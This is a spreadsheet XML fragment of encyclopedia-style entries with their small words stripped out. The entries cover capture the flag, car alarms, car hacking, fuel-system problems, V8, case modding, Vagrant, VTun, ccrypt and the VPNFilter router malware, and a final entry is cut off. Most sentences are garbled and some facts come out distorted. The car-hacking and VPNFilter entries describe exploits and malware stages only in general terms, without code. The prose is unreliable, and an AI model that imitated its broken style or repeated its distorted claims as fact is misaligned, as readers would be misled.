    <t>capture flag (ctf) traditional outdoor sport teams flag markers) objective capture team's flag, located team's "base", bring safely back base. enemy players "tagged" players home territory and, depending rules, game, become members opposite team, sent back territory, frozen place ("in jail") freed member team. overview capture flag requires playing field sort. indoor outdoor versions, field divided clearly designated halves, known territories. players form teams, territory. each side "flag" often piece fabric, object small enough easily carried person (night time games might flashlights, glowsticks lanterns "flags"). sometimes teams wear dark colors night make difficult opponents them. team opposing team's flag territory tagged opposing team's flag. objective game players venture opposing team's territory, grab flag return territory without tagged. flag defended mainly tagging opposing players attempt take within territory players "safe", meaning cannot tagged opposing players. once cross opposing team's territory vulnerable. rules capture flag appear 1860 german gymnastic manual lehr- handbuch deutschen turnkunst wilhelm lübeck name fahnenbarlauf. 19th century, independent game variation european game "barlaufen" (barlauf fahnenraub), played france germany.descriptions capture flag english language appeared early 20th century, "scouting boys" written 1908 robert baden-powell, founder scouting movement, title "flag raiding". they also appeared 1920 edition "the official handbook boys" published scouts america.the flag usually placed visibly obvious location rear team's territory. difficult version, flag hidden place seen certain angles. also might challenge involved. example, flag could hidden leaves tall tree, players flag, knock bring base. jail different versions capture flag different rules, handling flag happens tagged players. player tagged eliminated game entirely (out game), forced join opposing team, sent back territory, placed "jail" without guard (according number people team). jail predesignated area group's territory exists holding tagged players normally towards back group's territory. while tagged players confined jail limited, predetermined time, common form game involves option "jailbreak". version, players tagged remain jail indefinitely. however, players team free jail means jailbreak. jailbreaks accomplished player running territory enemy's jail. such action may, depending rules, free jailed players simply physically touched performing jailbreak. variants, teammates tagged jailed times, kicked game next round. general freed players obligated return directly territory attempting offensive action (i.e., attempting grab flag). while return side, freed players usually acquire "free walk-backs", safe tagging reach home territory. player performing jail break, hand, neither safe, restricted performing actions attempting grab flag generally moving enemy territory. sometimes, players jail form chains, teammate tags person chain, everyone free. simply leaving jail without freed considered poor sportsmanship severely frowned upon, often leading expulsion game. players team jailed (meaning teammate free jail), team time want find team's flag. capturing flag rules handling flag also vary game game deal mostly disposition flag failed attempt capturing variant, player tagged carrying flag, returned original place. another variant, flag left location player tagged. this latter variant makes offensive play easier, flag tend, course game, moved closer dividing line territories. games, possible players throw flag teammates. long flag stays play without hitting ground, allowed players pass. when flag captured player, they're safe tagged, unless trip. sometimes, flag holder safe all, even home territory, obtain flags, thus ending game. option return side hand teammate carry side. versions flag handed running. game player returns territory enemy flag teams' flags, whether throw, place, toss, insert, etc. also, rarely flag carrier attempt free teammates jail. variants alterations include "one flag" defensive team offensive team, games three flags. case latter, flags captured, one. another variation players bandannas pockets inches sticking out. instead tagging opponents, players must pull opponent's bandanna pocket. matter player bandanna pulled, they're captured must, depending preferences players, jail, return base returning play. version team territory, small base team's flag kept. win, team must flags base. urban settings, game played indoors enclosed area walls, similar walls hockey rink. there also spot sticking back opposing ends connected playing area flag placed urban variation, legal checking hockey style legal checking boards allowed. player commits foul illegal check placed penalty specified amount time, depending severity foul. player deliberately injures opponent expelled rest game. throwing flag allowed variation, long flag caught hits ground. flag thrown teammate hits ground caught, flag placed spot throw. player throws flag, blocked intercepted player opposing team, flag placed back base. technologies also glow-in-the-dark version called capture flag redux includes glowing orbs “flags,” color-coded bracelets differentiate team members, glowing jail markers. uncommon people play airsoft, paintball, nerf variations ctf. typically territories versions. players "hit" must predetermined amount time returning play (respawning). stealing sticks "stealing sticks" similar game played british isles, united states, australia. however, instead flag, number sticks items coats hats placed "goal" side playing field area. capture flag, players sent "prison" tagged opponents' side, freed teammates. each player take opponents' sticks time. first team take opponents' sticks side wins. software games 1984, scholastic published bannercatch apple commodore computers. edutainment game recognizable capture-the-flag mechanics, bannercatch allows humans (each alternating characters game world) play capture flag increasingly difficult team four bots. bannercatch's game world divided quadrants: home, enemy, "no-mans land" areas hold jails. successful capture requires bringing enemy flag team's "home" quadrant. players captured enemy territory, "no-mans land" holding flag. captured players must "rescued" designated jail members team. fallen flags remain dropped time-out period elapses, flag returns several starting locations home territory. also features walls, trees moving river, enabling wide variety strategies. special locations play area allow humans query game state (such flag status) using binary messages. 1992, richard carr released ms-dos based game called capture flag. turn-based strategy game real time network modem play play-by-mail) based around traditional outdoor game. game required players merely move characters onto square opponent's flag, opposed bringing back friendly territory, difficulties implementing artificial intelligence computer player would needed bring enemy flag home intercept opposing characters carrying flag. computer security computer security capture flag (ctf), "flags" secrets hidden purposefully-vulnerable programs websites. competitors steal flags either competitors (attack/defense-style ctfs) organizers (jeopardy-style challenges). several variations exist, including hiding flags hardware devices. urban gaming capture flag among games made recent comeback among adults part urban gaming trend (which includes games like pac-manhattan, fugitive, unreal tournament manhunt). game played city streets players cellphones communicate. news games spreads virally blogs mailing lists. urban capture flag played cities throughout north america. long running example occurs northrop mall university minnesota fridays typical attendance ranging several hundred. also darebase fugitive (game) steal bacon zarnitsa game references external links richard carr's website capture flag usscouts.org ctftime worldwide security tracking site</t>
  </si>
  <si>
    <t>Car alarm</t>
  </si>
  <si>
    <t>alarm electronic device installed vehicle attempt discourage theft vehicle itself, contents, both. alarms work emitting high-volume sound (often vehicle-mounted siren, klaxon, pre-recorded verbal warning, vehicle's horn, combination these) conditions necessary triggering met. such alarms also cause vehicle's headlights flash, notify car's owner incident paging system, interrupt electrical circuits necessary start. although inexpensive acquire install, effectiveness devices deterring vehicle burglary theft effect emit sound appears negligible. history early version alarm theft deterrent invented unknown prisoner denver 1913. this version manually armed, triggered someone tried crank engine. later alarm inspired early version remote starter published 1916. this version owner carry receiver, would buzz ignition system tampered with. features alarms confused immobilizers; although purpose deter theft, operate dissimilar fashion. immobilizer generally offer audible visual theft deterrence, require input driver driver non-immobilizer car. alarms divided categories: (built vehicle factory) aftermarket (installed time built, dealer, auto accessories store, vehicle's owner)alarms often come features. remote alarms typically consist additional radio receiver allows owner wirelessly control alarm fob. remote alarms typically come equipped array sensors along immobilizers motion detectors.keyless remote alarms typically based strong cryptography authentication methods: radio receiver immobilizer motion detector wireless arming disarming alarms remotes typically alarms disarmed armed remote. remotes recently rolling code. alarms almost alarms typically armed disarmed vehicle's keyless entry remote. many vehicles cylinders driver front passenger door activate switches, used door alarm disarm. some vehicles power door lock switch pressed driver's door open, door subsequently closed. some vehicles disarm ignition turned often vehicle equipped key-based immobilizer alarm, combination valid code ignition disarms system. aftermarket alarms like alarms, aftermarket systems usually armed disarmed remote. usually provisions external disarming cylinder, typically override switch mounted hidden location. triggers individual triggers alarm vary widely, depending make model vehicle, brand model alarm (for aftermarket alarms). since aftermarket alarms designed universal (i.e. compatible 12-volt negative ground electrical systems opposed carmaker's vehicles), commonly trigger inputs installer/vehicle owner chooses connect, additionally determines alarm off. generally, alarms monitor doors trunk/hatch unauthorized entry. vehicles done switches, mercury switches, microswitches integrated latch. others, doorlock mechanisms switches built them. some alarms additionally trigger hood opened, ignition turned systems shock sensor trigger upon significant impact vehicle's body, window glass broken. motion sensors monitoring vehicle's interior installed higher models. simplest aftermarket alarms one-piece units siren control module. common type sensor shock sensor wires (12-volt constant power ground) connected car's battery. this type alarm triggered vibration transferred shock sensor, voltage changes input (the alarm assumes sudden change voltage door trunk opened, ignition turned on); however, prone false triggers late-model vehicles many electronic control modules, draw current ignition off. more sophisticated aftermarket alarms wired vehicle's electronics individually. typically, alarms inputs power ground, well positive- negative-switched door open circuits, negative trunk and/or hood circuits, ignition-switched circuits detect ignition turned aftermarket alarms also usually shock sensor built control module external addition, aftermarket alarms provisions optional sensors (these must purchased separately). tilt sensor sense vehicle tilted (alerting towing). tilt sensors come digital mercury. digital sensor accurate since sets itself, allowing vehicle placed hill cause false triggers. sound discriminator glass breakage sensor senses sound glass breaking. typically, sound discriminator sensor eliminated using shock sensor. proximity, infrared, motion sensors sense motion inside outside vehicle; typically installed convertible t-top vehicles. these sensors usually adjustable order avoid false alarms. example, shock sensor sometimes vibrate loud noises area heavy trucks, loud vehicle exhaust, accidental bump passerby. proximity sensors often cause false alarms parking lots passerby entering exiting vehicle parked next armed car. these often cause alarm falsely sense attempted break-in. effectiveness although alarms kind available since beginning automobile era, dramatic increase installation 1980s 1990s coupled fact nearly types alarms easily triggered accidentally (frequently high sensitivity settings) means people hear often ignore them. 1994, york city police department claimed alarms actually making theft break-in crimes frequent. there account 1992 thief york city rocking deliberately trigger alarm order help conceal sound breaking window.because large number false alarms alarms, many vehicle manufacturers longer factory-fit simple noise-making alarms, instead offering silent immobilizers. alternatively, aftermarket vehicle tracking system easily trace stolen vehicles. most police tracking systems require user recurring fee, whereas factory immobilizers included purchase price vehicle. locating systems enable owner vehicle lock unlock, track, disable starter vehicle online.frequently, false alarms occur alarm owners high sensitivity settings. this main reason loud bass frequency sound (loud music, cars motorcycles loud exhaust systems, thunderstorms, etc.) alarms. second possible reason parts alarm system improperly installed. also anti-hijack system locator immobiliser long range acoustic device noise pollution vehicle tracking system mul-t-lock references</t>
  </si>
  <si>
    <t>Car hacking</t>
  </si>
  <si>
    <t>automotive hacking exploitation vulnerabilities within software, hardware, communication systems automobiles. overview modern automobiles contain hundreds on-board computers processing everything vehicle controls infotainment system. these computers, called electronic control units (ecu), communicate multiple networks communication protocols including controller area network (can) vehicle component communication connections engine brake control; local interconnect network (lin) cheaper vehicle component communication door locks interior lights; media oriented systems transport (most) infotainment systems modern touchscreen telematics connections; flexray high-speed vehicle component communications active suspension active cruise control data synchronization.additional consumer communication systems also integrated automobile architectures including bluetooth wireless device connections, internet hotspots, vehicle wi-fi. integration various communications software systems leaves automobiles vulnerable attack. security researchers begun demonstrating multitude potential attack vectors modern vehicles, real-world exploits resulted manufacturers issuing vehicle recalls software updates mobile applications. manufacturers, john deere, used computer systems digital rights management prevent repairs vehicle owners, third parties, aftermarket parts. such limitations prompted efforts circumvent systems, increased interest measures motor vehicle owners' right repair act. research 2010, security researchers demonstrated could create physical effects undermine system controls hacking ecu. researchers needed physical access able gain full control safety automotive system including disabling brakes stopping engine.in follow-up research paper published 2011, researchers demonstrated physical access even necessary. researchers showed “remote exploitation feasible via...mechanics tools, players, bluetooth, cellular radio...and wireless communication channels allow long distance vehicle control, location tracking, in-cabin audio exfiltration theft”. this means hacker could gain access vehicle's vital control systems almost anything interfaces automobile's systems. recent exploits 2015 fiat chrysler uconnect hack uconnect fiat chrysler's internet-connected feature enables owners ability control vehicle's infotainment/navigation system, sync media, make phone calls. even integrates optional on-board wifi.however, susceptibilities fiat chrysler’s uconnect system, available million cars, allows hackers scan cars system, connect embed malicious code, ultimately, commandeer vital vehicle controls like steering brakes. 2015 tesla model hack 2015 hacking conference marc rogers kevin mahaffey demonstrated chain exploits could used take complete control model marc rogers kevin mahaffey identified several remote local vulnerabilities could used entry points. they demonstrated exploitation vehicle could remotely controlled iphone. finally, also demonstrated possible install backdoor allowed persistent access control vehicle similar fashion exploit techniques usually associated traditional computer systems. marc rogers kevin mahaffey worked tesla, inc. resolve issues disclosure. announced presentation entire global fleet model cars patched overnight, first proactive mass over (ota) security update vulnerable vehicles. general motors onstar remotelink onstar remotelink allows users ability utilize onstar capabilities android smartphones. remotelink locate, lock unlock, even start vehicle.the flaw general motors’ onstar remotelink app, extreme uconnect, allows hackers impersonate victim eyes remotelink app. this means hackers access features remotelink available victim including locating, locking unlocking, starting engine. keyless entry security researcher samy kamkar demonstrated device intercepts signals keyless-entry fobs would allow attacker unlock doors start car's engine. references</t>
  </si>
  <si>
    <t>Carburetor icing</t>
  </si>
  <si>
    <t>carburetor icing, carb icing, icing condition affect carburetor certain atmospheric conditions. problem notable certain realms aviation. carburetor icing caused temperature drop carburetor, effect fuel vaporization, temperature drop associated pressure drop venturi. temperature drops freezing, water vapor freeze onto throttle valve, internal surfaces carburetor. venturi effect drop ambient temperature absolute degrees fahrenheit degrees celsius). words, outside temperature degree drop degrees carburetor. carburetor icing often occurs outside temperature degrees degrees relative humidity percent.unfortunately, warm temperature often causes pilots aircraft overlook possibility carb icing. form surfaces carburetor throat, restricting this increase venturi effect initially, eventually restricts airflow, perhaps even causing complete blockage carburetor. engine begins rich formation increases. without intervention (carb heat leaning) continue mixture outside "chemically correct" range combustion. icing also cause jamming mechanical parts carburetor, throttle, typically butterfly valve. while applies carburetors, carburetor icing particular concern association piston-powered aircraft, especially small, single-engine, light aircraft. aircraft powered carbureted engines equipped carburetor heat systems overcome icing problem. cars, carburetor icing occasionally nuisance. inlet manifold parts carburetor often warm water cooling system exhaust circulating combat problem. motorcycles also suffer carburetor icing, although engine designs susceptible others. air-cooled engines prone icing, absence warm coolant circulating engine. also references</t>
  </si>
  <si>
    <t>Vapor lock</t>
  </si>
  <si>
    <t>vapor lock problem caused liquid fuel changing state still fuel delivery system gasoline-fueled internal combustion engines. this disrupts operation fuel pump, causing loss feed pressure carburetor fuel injection system, resulting transient loss power complete stalling. restarting engine state difficult.the fuel vaporize heated engine, local climate lower boiling point high altitude. regions fuels lower viscosity (and lower boiling threshold) used winter improve engine startup, continued specialized fuels summer cause vapor lock occur readily. causes incidence vapor lock common older gasoline-fuel systems incorporating low-pressure mechanical fuel pump driven engine, located engine compartment feeding carburetor. such pumps typically located higher fuel tank, directly heated engine fuel directly float bowl inside carburetor. fuel drawn negative pressure (gauge pressure) feed line, increasing risk vapor lock developing tank pump. vapor lock drawn fuel pump could disrupt fuel pressure long enough float chamber carburetor partially completely drain, causing fuel starvation engine. even temporary disruption fuel supply float chamber ideal; carburetors designed fixed level fuel float bowl reducing level reduce fuel mixture delivered engine. carburetor units effectively deal fuel vapor delivered float chamber. most designs incorporate pressure-balance duct linking float bowl either intake carburetor outside air. even pump handle vapor locks effectively, fuel vapor entering float bowl vented. done intake system, mixture effect, enriched, creating mixture-control pollution issue. done venting outside, result direct hydrocarbon pollution effective loss fuel efficiency possibly fuel-odor problem. reason, fuel-delivery systems allow fuel vapor returned fuel tank condensed back liquid phase, active carbon filled canister fuel vapor absorbed. this usually implemented removing fuel vapor fuel line near engine rather float bowl. such system also divert excess fuel pressure pump back tank. most modern engines equipped fuel injection electric submersible fuel pump fuel tank. moving fuel pump interior tank helps prevent vapor lock since entire fuel-delivery system positive pressure fuel pump runs cooler would located engine compartment. this primary reason vapor lock rare modern fuel systems. reason, carbureted engines retrofitted electric fuel pump near fuel tank. vapor lock likely develop vehicle traffic under-hood temperature tends rise. vapor lock also develop engine stopped vehicle parked short period. fuel line near engine move thus heat sufficiently form vapor lock. problem likely weather high altitude either case. gravity-feed fuel systems immune vapor lock. much foregoing applies equally gravity-feed system. vapor forms fuel line, lower density reduces pressure developed weight fuel. this pressure normally moves fuel tank carburetor, fuel supply disrupted vapor removed, either remaining fuel pressure forcing float bowl vent allowing vapor cool re-condense. vapor lock cause forced landings aircraft. that aviation fuel manufactured lower vapor pressure automotive gasoline (petrol). addition, aircraft susceptible ability change altitude associated ambient pressure rapidly. liquids boil lower temperatures lower pressure environments. motorsports vapor lock common occurrence stock racing, since cars traditionally used gasoline carburetors. with introduction fuel injection requirement nascar-sanctioned events 2012, vapor lock largely eliminated. vapor lock also less common motorsports, formula indycar racing, fuel injection alcohol fuels (ethanol methanol), lower vapor pressure gasoline. however, entirely unlikely happen, double bull racing retirements 2022 bahrain grand prix caused vapor lock, presumably unusually high temperatures fuel system. incidence fuels higher volatility fuel, likely vapor lock occur. historically, gasoline volatile distillate prone vapor lock. conversely, diesel fuel less volatile gasoline, diesel engines almost never suffer vapor lock. however, diesel engine fuel systems susceptible locks fuel lines, standard diesel fuel injection pumps rely fuel non-compressible. locks caused leaking fuel delivery line entering tank. locks eliminated turning engine time using starter motor, bleeding fuel system. modern diesel injection systems self-bleeding electric pumps eliminate lock problem. also flooded engine, different fuel-related issue similar symptoms lock, restriction fluid pipe caused references</t>
  </si>
  <si>
    <t>V8 (JavaScript engine)</t>
  </si>
  <si>
    <t>free open-source javascript engine developed chromium project google chrome chromium browsers. project’s creator lars bak. first version engine released time first version chrome: september 2008. also used server side, example couchbase node.js. history assembler based strongtalk assembler. december 2010, compiling infrastructure named crankshaft released, speed improvements. version chrome 2015, project turbofan added provide performance improvements previously challenging workloads asm.js. much v8's development strongly inspired java hotspot virtual machine developed microsystems, newer execution pipelines similar hotspot's. 2016, ignition interpreter added design goal reducing memory usage small memory android phones comparison turbofan crankshaft. ignition register based machine shares similar (albeit exact same) design templating interpreter utilized hotspot. 2017, shipped brand-new compiler pipeline, consisting ignition (the interpreter) turbofan (the optimizing compiler). starting version 5.9, full-codegen (the early baseline compiler) crankshaft longer used javascript execution, since team believed longer able keep pace javascript language features optimizations features required.in 2021, tiered compilation pipeline introduced release sparkplug compiler, supplements existing turbofan compiler within direct parallel profiling compiler used hotspot. design first generates abstract syntax tree parser. then, ignition generates bytecode syntax tree using internal bytecode format. turbofan compiles bytecode machine code. words, compiles ecmascript directly native machine code using just-in-time compilation executing compiled code additionally optimized (and re-optimized) dynamically runtime, based heuristics code's execution profile. optimization techniques used include inlining, elision expensive runtime properties, inline caching. garbage collector generational incremental collector. usage compile x86, mips instruction architectures 32-bit 64-bit editions; additionally ported powerpc s390 servers.v8 used browser integrated independent projects. used following software: chromium-based browsers google chrome, brave, opera, vivaldi microsoft edge. couchbase database server deno runtime environment electron desktop application framework, used atom visual studio code text editors marklogic database server nativescript mobile application framework node.js runtime environment quick runtime environment also blink, chromium browser engine comparison javascript engines references external links official website</t>
  </si>
  <si>
    <t>Cardkey</t>
  </si>
  <si>
    <t>cardkey producer electronic access control products based simi valley, california. they first company develop widely distribute "electronic access control systems". company's original readers used cards made barium ferrite worked magnetically attracting repelling locking/unlocking cores within reader module mechanism. these cards primarily used fraternal organizations clubs, bpoe (elks) others. from first develop wiegand cards readers magnetically based reliable require calibration used barium ferrite readers. these cards readers highly programmable, used applications ranging (american district telegraph) government installations worldwide. offices manchester reading sold systems companies british telecom, shell main facility cardkey located nordhoff mason chatsworth additional location cozycroft chatsworth housed customer engineering singular engineering project (pass system) approximately 1978. they division greer hydraulics, inc., january 1999 bought johnson controls, company whose founder invented electric room thermostat late 1800s. also card reader card references</t>
  </si>
  <si>
    <t>Case modding</t>
  </si>
  <si>
    <t>case modification, commonly referred case modding, modification computer case video game console chassis. modifying computer case non-standard considered case mod. modding done, particularly hardware enthusiasts, show computer's apparent power showing internal hardware, also make look aesthetically pleasing owner. cases also modified improve computer's performance; usually associated cooling involves changes components well case. history when personal computers first became available public, majority produced simple, beige-colored cases. this design sometimes referred beige box. although purpose containing components personal computer, many users considered computers "tacky" "dull", began modifying existing chassis, building scratch. original case mods "macquarium", consists replacing screen compact macintosh case fishbowl. market third-party computer cases accessories began develop, today cases available wide variety colors styles. today business "modding" computers cases hugely profitable endeavor, modding competitions everywhere. since 2017, computer hardware companies started offer products built-in lighting, replacing earlier non-rgb (single color led) lighting. non-rgb lighting started replace earlier ccfl-based (mixed single color leds) lighting, starting late 2000s early 2010s. lighting integrated onto fans, liquid cooler pumps, modules, graphic card coolers, installed case light strip. lights controlled motherboard onboard lighting controller, externally separate controller. they also draw power directly power supply. many cases 2019) come side windows fans. common modifications appearance peripheral mods: peripherals like keyboard, mouse, speakers sometimes painted otherwise modified match computer. some system builders, effort make system portable convenient, install speakers small screens case. case building: sometime modders build entire cases scratch. some attempt treat case work art. others make look like appear something else, like teddy bear, wooden cabinet, shelf mounted wall, antique equipment macintosh plus atari 2600 video game console. relatively case modders builders make computer cases scratch; sometimes hundreds hours work. case, project nighthawk, dark blade case examples professional cases built scratch. component modding: this type modding, name suggests, involves modifying components perceived improvement appearance. example relocation buttons optical drives. this often done combination "stealthing", hides drive's visibility masking blank face. riskier modification installing hard drive windows show platters mechanism, must done clean room without significant dust. people attempted results seem vary. some hard drives, including raptor, come window standard. laptop modding: laptops modified much like typical computer case. while laptop mods consist paint finishes, others chosen engrave designs laptop cover (behind screen). laptops also turned digital photo frames. these types mods typically void warranty device. avoid warranty issues, skins stickers purchased easily removable casing. window mods: this refers window placed within panels computer case. this often done left hand side panel, less often panel. this modification popular many major case manufacturers offer cases windows pre-installed, replaceable side panels window installed. some companies even offer entire cases made transparent materials. window modified hold screen. laser engraving done acrylic windows distinct look modded case. lighting mods: lighting refers lighting computer cases. this usually achieved cold cathode lights (ccls), case fans, electroluminescent wire lights. lights sometimes paired sound controllers make lights pulse time sound. ccls come long tubes generally produce little heat. leds come many sizes forms, often seen bars similar ccls within fans. electroluminescent wire, takes form small light rope, sometimes embedded cables sata cables. lighting modifications usually paired window mods help show components. internal components case fans, heatsink fans, power supplies often available built lighting. paint mods: painting case another method case modders distinguish work others. spray paint common method preferred among amateur modders. there many spray painting guides amateur modders. finish cannot compared automotive paint powder coating (see less common modifications), simple change look case. re-coloring plastics case, keyboard, mouse speakers vinyl another method case modders highlight system, making different rest. vinyl advantages ease like spray paint, much durable chip scratch off. also create ‘layer’ like spray paint similar. cable management: routing cables, often computer cases, aesthetically pleasing also common practice case modding. similarly, covering cables fabric, known cable sleeving also undertaken provide uniform look theme case. function cooling mods: there many modifications fall category. common simply drilling mount fan, removing restrictive grill. others include ducts, water cooling, filtering, sealing openings make flow components instead escaping near entered, even adding tank pressurized carbon dioxide liters mineral case. these modifications often performed overclockers either looking better cooling components noise (sound) reduction. some modifications merely show modding skill talent functional purpose. hardcore overclockers often install cooling systems sole purpose achieving performance records. such systems include water cooling, phase change materials, thermoelectric/peltiercoolers, liquid nitrogen. less common modifications automotive paint finishes: automotive paint refers paint typically seen cars trucks. this type finish requires compressed source, compressor tank, spray gun. expensive finish using spray cans, done skillfully better looking much durable. other methods painting include powder coating highly durable though quite aesthetically pleasing many modders automotive paint. electroplating also done steel computer cases parts. aluminum cases plated anodized well, processes available plate plastic cases. plated coatings range nickel chrome even gold. more elaborate finishes crafted using combination techniques, chrome plating transparent color coat. body filler: body filler bondo) two-part putty often used dents automobiles. case modders fill sculpt creations. when mixed paste catalyst filler hardens short period time sanded, ground desired shape. alternative system uses fiberglass resin (catalyzed liquid hardener) either fiberglass cloth fill holes form shapes. lacquer based spot putty often used fill smaller imperfections application primer. typically, case modder uses combination materials obtain desired result. this method usually used front plastic bezel computer case give look. contests many websites companies feature contests case modders, awarding prizes accolades winners. examples include bit-tech's month year competitions, contests sponsored computer enthusiast magazines, magazine custom magazine, monthly modding contests. other contests sometimes supported computer parts manufacturers. console case modding console case modding refers modification case game console. common consoles modify xbox xbox 360, much room inside customize items lights fans. moreover, xbox requires additional cooling factory configuration avoid overheating issues wrong type lead-free solder, capable handling temperature limits standard solder can. these consoles controllers also relatively easy take apart. wish scratch-build mods, several companies sell transparent xbox cases various cooling/lighting equipment them. console case modding started late 1980s sega genesis, released; many customers simply pictures stickers playstation released. many case modders started change hardware, example altering play copied games (known 'chipping' games console). common modification playstation 'chipping' process (mentioned above). when nintendo dreamcast playstation released, many chipped them, styled them, added additional cooling; went changing hardware itself. when xbox xbox released, many modders personally customized further, using neon lights, transparent cases, fans, hard drives opposed xbox-branded drives). many modders found altering interior xbox 360s difficult absence power cable (normally cord attaches hard disk drive motherboard). despite shortcomings, modders also found power neon lighting powered equipment using dvd-rom power supply; however, insufficient power hard disk drive, often caused freezing disk access. another common method internal case modding uses power outlet internal splitting cord connector. however, date modders power points (power supply) plugs diminish little) power console. also hardware hacking modchip modding overclocking decoration references external links case world series 2020 casemodgod bleeds! modders</t>
  </si>
  <si>
    <t>Vagrant (software)</t>
  </si>
  <si>
    <t>vagrant open-source software product building maintaining portable virtual software development environments; e.g., virtualbox, kvm, hyper-v, docker containers, vmware, aws. tries simplify software configuration management virtualization order increase development productivity. vagrant written ruby language, ecosystem supports development languages. history vagrant first started personal side-project mitchell hashimoto january 2010. first version vagrant released march 2010. october 2010, engine yard declared going sponsor vagrant project. first stable version, vagrant 1.0, released march 2012, exactly years original version released. november 2012, mitchell formed organization called hashicorp support full-time development vagrant; vagrant remained permissively licensed free software. hashicorp works creating commercial editions provides professional support training vagrant. vagrant originally tied virtualbox, version added support virtualization software vmware kvm, server environments like amazon ec2. vagrant written ruby, used projects written programming languages php, python, java, javascript. since version 1.6, vagrant natively supports docker containers, cases serve substitute fully virtualized operating system. architecture vagrant uses "provisioners" "providers" building blocks manage development environments. provisioners tools allow users customize configuration virtual environments. puppet chef widely used provisioners vagrant ecosystem (ansible available since least 2014). providers services vagrant uses create virtual environments. support virtualbox, hyper-v, docker virtualization ships vagrant, vmware supported plugins. vagrant sits virtualization software wrapper helps developer interact easily providers. automates configuration virtual environments using chef puppet, user directly virtualization software. machine software requirements written file called "vagrantfile" execute necessary steps order create development-ready box. "box" format extension (.box) vagrant environments copied another machine order replicate environment. official vagrant documentation details installation, command line usage, relevant configuration vagrant. references external links official website list vagrant boxes</t>
  </si>
  <si>
    <t>Casync</t>
  </si>
  <si>
    <t>casync (content-addressable synchronisation) linux software utility designed distribute frequently-updated file system images internet. utility according creator lennart poettering, casync inspired rsync git, well tar. casync aimed used internet things (iot), container, virtual machine (vm), portable services, operating system (os) images, well backups home directory synchronization. casync splits images variable size segments, uses sha256 checksums, aims work content delivery networks (cdns). available linux only, packages available ubuntu, fedora arch linux. similar software similar software delivers file system images are: docker layered tarballs ostree also bittorrent data deduplication flatpak interplanetary file system squashfs zsync references</t>
  </si>
  <si>
    <t>VTun</t>
  </si>
  <si>
    <t>vtun networking application virtual tunnels tcp/ip networks. supports internet protocol (ip), point-to-point protocol (ppp) serial line internet protocol (slip) protocols. exists reference implementation tun/tap user-space tunnel driver included linux kernel version 2.4, also originally developed maxim krasnyansky. bishop clark current maintainer. networking like applications nature, vtun creates single connection machines, multiplexes traffic. vtun connections initiated connection client server. server initiates connection client, protocol requested. software allows creation tunnels, routing traffic manner similar ppp, well bridge-friendly ethertap connection. authentication vtun uses private shared negotiate handshake challenge response. non-encrypting versions continual source concern, target strongly worded security assessment, vtun server client binary applications completely built without encryption support. when binaries used, encryption endpoints simple cipher, completely trivial decode. this type build supported developers. external links vtun sourceforge</t>
  </si>
  <si>
    <t>Ccrypt</t>
  </si>
  <si>
    <t>ccrypt utility secure encryption decryption files streams. designed replacement standard unix crypt utility, notorious using weak encryption algorithm. ccrypt based rijndael cypher, cipher used standard. however, standard 128-bit block size used, whereas ccrypt uses 256-bit block size. ccrypt commonly uses .cpt file extension encrypted files. ccrypt provide authenticated encryption scheme therefore protect integrity encrypted data. also bcrypt crypt (unix) mcrypt scrypt references external links ccrypt homepage</t>
  </si>
  <si>
    <t>VPNFilter</t>
  </si>
  <si>
    <t>vpnfilter malware designed infect routers certain network attached storage devices. 2018, estimated infected approximately 500,000 routers worldwide, though number at-risk devices larger. steal data, contains "kill switch" designed disable infected router command, able persist user reboot router. believes created russian fancy bear group. later announced believe fancy bear sandworm (also known voodoo bear) group. february 2022, cisa announced malware called cyclops blink produced sandworm replaced vpnfilter. operation vpnfilter malware infecting number different kinds network routers storage devices. seems designed part target serial networking devices using modbus protocol talk control industrial hardware, factories warehouses. malware special, dedicated code target control systems using scada.the initial infection vector still unknown. cisco talos security group hypothesizes malware exploits known router security vulnerabilities infect devices.this software installs multiple stages: stage involves worm adds code device's crontab (the list tasks regular intervals cron scheduler linux). this allows remain device reboot, re-infect subsequent stages removed. stage uses known urls find install stage malware. known urls disabled, stage sets socket listener device waits contacted command control systems. stage body malware, including basic code carries normal functions executes instructions requested special, optional stage modules. stage various "modules" tell malware specific things, like sniffing network data, gathering credentials, serving relay point hide origin subsequent attacks, collecting data industrial control devices (modbus scada). exfiltrated data encrypted network. mitigation both cisco symantec suggest people affected devices factory reset. that typically accomplished using small, pointed object, straightened paperclip, push small reset button back unit seconds (time varies model). this remove malware, also restores router original settings. router remote management enabled, factory reset often disable (the default setting many routers). remote management thought possible vector initial attack. before connecting factory-reset router internet again, device's default passwords changed prevent reinfection. devices risk initial worm installs vpnfilter attack devices running embedded firmware based busybox linux compiled specific processors. this include non-embedded linux devices workstations servers.manufacturer-provided firmware following router models known risk: asus rt-ax92u rt-ac66u rt-n10 rt-n10e rt-n10u rt-n56u rt-n66u d-link des-1210-08p dir-300 dir-300a dsr-250n dsr-500n dsr-1000 dsr-1000n huawei hg8245 linksys e1200 e2500 e3000 e3200 e4200 rv082 wrvs4400n mikrotik ccr1009 ccr1016 ccr1036 ccr1072 crs109 crs112 crs125 rb411 rb450 rb750 rb911 rb921 rb941 rb951 rb952 rb960 rb962 rb1100 rb1200 rb2011 rb3011 groove omnitik stx5 mikrotik routeros versions 6.38.5 current 6.37.5 bugfix release chains netgear dg834 dgn1000 dgn2200 dgn3500 fvs318n mbrn3000 r6400 r7000 r8000 wnr1000 wnr2000 wnr2200 wnr4000 wndr3700 wndr4000 wndr4300 wndr4300-tn utm50 qnap ts251 ts439 other qnap devices running software tp-link r600vpn tl-wr741nd tl-wr841n ubiquiti nsm2 upvel unknown models zxhn h108n epidemiology vpnfilter described cisco talos infected many 500,000 devices worldwide, perhaps different countries, though proportionately focus ukraine. investigation taken high-profile role addressing malware, conducting investigation resulted seizure domain name toknowall.com ostensibly used redirect queries stage malware, allowing locate install copies stages justice department also compelled site photobucket disable known urls used distribute malware stage recommendation removing infection 2018, recommended users reboot at-risk devices. this would temporarily remove stages malware. stage would remain, leading router re-downloading payload infecting router again. however, prior recommendation justice department seized endpoints malware uses stage installation. without urls, malware must rely fallback socket listener stage installation. this method requires threat actor command control systems contact system install stage increasing threat actor's risk identified. recommended users disable remote management devices update firmware. firmware update removes stages malware, though possible device could reinfected.the said would help find servers distributing payload. notes references also cyclops blink</t>
  </si>
  <si>
    <t>VPNBook</t>
  </si>
  <si>
